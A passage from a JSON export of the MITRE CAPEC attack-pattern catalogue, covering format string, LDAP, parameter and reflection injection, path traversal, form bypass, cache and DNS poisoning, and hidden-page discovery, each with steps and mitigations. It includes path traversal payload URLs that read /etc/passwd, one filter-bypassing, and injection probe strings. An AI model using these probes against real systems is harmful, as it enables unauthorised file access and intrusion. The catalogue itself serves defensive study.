stack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The adversary takes an inventory of the entry points of the application.","Technique":["Spider web sites for all available links","List parameters, external variables, configuration files variables, etc. that are possibly used by the application."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to format string injection] Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.","Technique":"Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters."},{"Step":"3","Phase":"Exploit","Description":"[Try to exploit the Format String Injection vulnerability] After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.","Technique":"Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc."}]},"Prerequisites":{"Prerequisite":"The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters."},"Skills_Required":{"Skill":["In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Limit the usage of formatting string functions.","Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters."]},"Example_Instances":{"Example":"Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \\"../po\\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"134"},{"CWE_ID":"20"},{"CWE_ID":"74"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Format string attack"}},"References":{"Reference":[{"External_Reference_ID":"REF-14"},{"External_Reference_ID":"REF-15","Section":"WASC-06 - Format String"},{"External_Reference_ID":"REF-616","Section":"Testing for Format String Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"136":{"ID":"136","Name":"LDAP Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The attacker takes an inventory of the entry points of the application.","Technique":["Spider web sites for all available links","Sniff network communications with application using a utility such as WireShark."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to LDAP injection] For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Try to exploit the LDAP injection vulnerability] After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.","Technique":["Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header."]}]},"Prerequisites":{"Prerequisite":"The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of LDAP, especially its query syntax.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application."]},"Example_Instances":{"Example":"PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"77"},{"CWE_ID":"90"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"29","Entry_Name":"LDAP Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"LDAP Injection"}]},"References":{"Reference":[{"External_Reference_ID":"REF-17","Section":"WASC-29 - LDAP Injection"},{"External_Reference_ID":"REF-608","Section":"Testing for LDAP Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"137":{"ID":"137","Name":"Parameter Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \\"myInput&new_param=myValue\\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":["The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.","The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data","Note":"Successful parameter injection attacks mean a compromise to integrity of the application."}},"Mitigations":{"Mitigation":["Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.","Treat all user input as untrusted data that must be validated before use."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"88"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Related_Weaknesses"}]}},"138":{"ID":"138","Name":"Reflection Injection","Abstraction":"Standard","Status":"Draft","Description":"An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.","The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"139":{"ID":"139","Name":"Relative Path Traversal","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\\\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target\'s directory structure.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey application] Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.","Technique":["Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt variations on input parameters] Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.","Technique":["Provide \\"../\\" or \\"..\\\\\\" at the beginning of any filename to traverse to the parent directory","Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \\"../\\".","Use a proxy tool to record results of manual input of relative path traversal probes in known URLs."]},{"Step":"4","Phase":"Exploit","Description":"[Access, modify, or execute arbitrary files.] An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.","Technique":["Manipulate file and its path by injecting relative path sequences (e.g. \\"../\\").","Download files, modify files, or try to execute shell commands (with binary files)."]}]},"Prerequisites":{"Prerequisite":"The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass non trivial filters in the application",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.","Implementation: Prefer working without user input when using file system calls","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications."]},"Example_Instances":{"Example":{"p":["The attacker uses relative path traversal to access files in the application. This is an example of accessing user\'s password file.","However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.","Then an attacker creates special payloads to bypass this filter:","When the application gets this input string, it will be the desired vector by the attacker."],"div":["http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd",{"style":"margin-left:10px;","class":"attack"},"http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"23"}},"References":{"Reference":[{"External_Reference_ID":"REF-9","Section":"Testing for Path Traversal (OWASP-AZ-001)"},{"External_Reference_ID":"REF-10","Section":"WASC-33 - Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"140":{"ID":"140","Name":"Bypassing of Intermediate Forms in Multiple-Form Sets","Abstraction":"Standard","Status":"Draft","Description":"Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"74","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"372"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"141":{"ID":"141","Name":"Cache Poisoning","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers\' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application\'s cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify and explore caches] Use tools to sniff traffic and scan a network in order to locate application\'s cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.","Technique":"Run tools that check available entries in the cache."},{"Step":"2","Phase":"Experiment","Description":"[Cause specific data to be cached] An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.","Technique":"Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID)."},{"Step":"3","Phase":"Exploit","Description":"[Redirect users to malicious website] As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.","Technique":["Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).","Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties."]}]},"Prerequisites":{"Prerequisite":["The attacker must be able to modify the value stored in a cache to match a desired value.","The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations."]},"Skills_Required":{"Skill":["To overwrite/modify targeted cache",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Configuration: Disable client side caching.","Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes."]},"Example_Instances":{"Example":{"div":["DNS cache poisoning example",{"style":"color:#32498D; font-weight:bold;"}],"p":["In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.","Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com","When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"348"},{"CWE_ID":"345"},{"CWE_ID":"349"},{"CWE_ID":"346"},{"CWE_ID":"441"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cache Poisoning"}},"References":{"Reference":[{"External_Reference_ID":"REF-22","Section":"DNS Cache Poisoning"},{"External_Reference_ID":"REF-23","Section":"DNS Threats & Weaknesses of the Domain Name System"},{"External_Reference_ID":"REF-24","Section":"Arp Spoofing"},{"External_Reference_ID":"REF-599","Section":"Testing for Browser Cache Weaknesses"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}]}},"142":{"ID":"142","Name":"DNS Cache Poisoning","Abstraction":"Detailed","Status":"Draft","Description":"A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim\'s computer or to masquerade as part of a Pharming attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"89"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Explore resolver caches] Check DNS caches on local DNS server and client\'s browser with DNS cache enabled.","Technique":["Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.","Figure out if the client\'s browser has DNS cache enabled."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt sending crafted records to DNS cache] A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.","Technique":["Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.","If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction","Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website\'s IP address."]},{"Step":"3","Phase":"Exploit","Description":"[Redirect users to malicious website] As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site\'s domain name.","Technique":["Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.","Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties."]}]},"Prerequisites":{"Prerequisite":"A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions."},"Skills_Required":{"Skill":["To overwrite/modify targeted DNS cache",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary\'s goals."},"Mitigations":{"Mitigation":["Configuration: Make sure your DNS servers have been updated to the latest versions","Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.","Configuration: Disable client side DNS caching."]},"Example_Instances":{"Example":{"p":["In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.","Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com","When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"348"},{"CWE_ID":"345"},{"CWE_ID":"349"},{"CWE_ID":"346"},{"CWE_ID":"441"},{"CWE_ID":"350"}]},"References":{"Reference":[{"External_Reference_ID":"REF-22","Section":"DNS Cache Poisoning"},{"External_Reference_ID":"REF-23","Section":"DNS Threats & Weaknesses of the Domain Name System"},{"External_Reference_ID":"REF-27"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}]}},"143":{"ID":"143","Name":"Detect Unpublicized Web Pages","Abstraction":"Detailed","Status":"Draft","Description":"An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web site] An adversary finds a target web site that they think may have unpublicized web pages"},{"Step":"2","Phase":"Explore","Description":"[Map the published web site] The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree","Technique":["Use Dirbuster to brute force directories and file names to find unpublicized pages","Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked"]},{"Step":"3","Phase":"Experiment","Description":"[Try to find weaknesses or information] The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public","Technique":["Manually analyze files or pages for information that could be useful in a further attack","Use a static analysis tool to find weaknesses in unpublished web pages"]},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack."},"Resources_Required":{"Resource":"Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 